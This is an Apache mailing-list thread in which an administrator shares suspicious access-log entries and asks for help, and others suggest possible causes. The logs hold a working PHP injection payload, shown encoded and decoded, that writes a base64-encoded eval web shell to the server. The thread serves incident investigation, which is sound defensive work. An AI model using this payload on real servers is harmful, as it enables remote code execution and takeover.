Actually now that I re-read the requests it also looks as shellshock succesful attempt.
Operative system software not updated recently either? 2017-02-06 17:42 GMT+01:00 Daniel <dferra...@gmail.com>: > Have you tried to send those requests yourself and see what you get? > > Still those requests seem to be aimed at your php framework. > > Do you use a very old php version as well? > > 2017-02-06 17:41 GMT+01:00 Lentes, Bernd <bernd.lentes@helmholtz- > muenchen.de>: > >> >> ----- On Feb 6, 2017, at 5:14 PM, Bernd Lentes bernd.lentes@helmholtz- >> muenchen.de wrote: >> >> > Hi, >> > >> > just in the moment i found two very weird entries in may access_log: >> > >> > 91.200.12.33 - - [06/Feb/2017:16:43:26 +0100] 236 "GET >> > /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_ >> time_limit%280%29%3B%40set_magic_quotes_runtime%280%29% >> 3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUME >> > NT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27 >> PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B >> > HTTP/1.1" 200 90 >> > 91.200.12.33 - - [06/Feb/2017:16:44:33 +0100] 253 "GET >> > /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_ >> time_limit%280%29%3B%40set_magic_quotes_runtime%280%29% >> 3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUME >> > NT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27 >> PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B >> > HTTP/1.1" 200 90 >> > >> > What upsets me is that these two requests have statuscode 200, which >> mean it was >> > successfull. >> > The IP is from ukraine. Where can i find out what these %charcacters >> mean ? Does >> > anyone understand what happened here ? It's apache 2.2.3 64bit. >> > >> > Thanks for any hint. >> > >> > Bernd >> > >> >> What i find out already: >> https://url-encoder.de/ helped me to decode the URL: >> /?1=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo >> '->|';file_put_contents($_SERVER['DOCUME >> NT_ROOT'].'/webconfig.txt.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'));echo >> '|<-'; >> >> Currently i don't understand what this means. >> I don't find a file webconfig.txt.php on my system. >> Currently no weird process, no new user in /etc/passwd, no packtes to the >> network which includes this ip. >> >> Thankful for any tip. >> >> >> Bernd >> >> >> Helmholtz Zentrum Muenchen >> Deutsches Forschungszentrum fuer Gesundheit und Umwelt (GmbH) >> Ingolstaedter Landstr. 1 >> 85764 Neuherberg >> www.helmholtz-muenchen.de >> Aufsichtsratsvorsitzende: MinDir'in Baerbel Brumme-Bothe >> Geschaeftsfuehrer: Prof. Dr. Guenther Wess, Heinrich Bassler, Dr. Alfons >> Enhsen >> Registergericht: Amtsgericht Muenchen HRB 6466 >> USt-IdNr: DE 129521671 >> >> >> --------------------------------------------------------------------- >> To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org >> For additional commands, e-mail: users-h...@httpd.apache.org >> >> > > > -- > *Daniel Ferradal* > IT Specialist > > email dferradal at gmail.com > linkedin es.linkedin.com/in/danielferradal > -- *Daniel Ferradal* IT Specialist email dferradal at gmail.com linkedin es.linkedin.com/in/danielferradal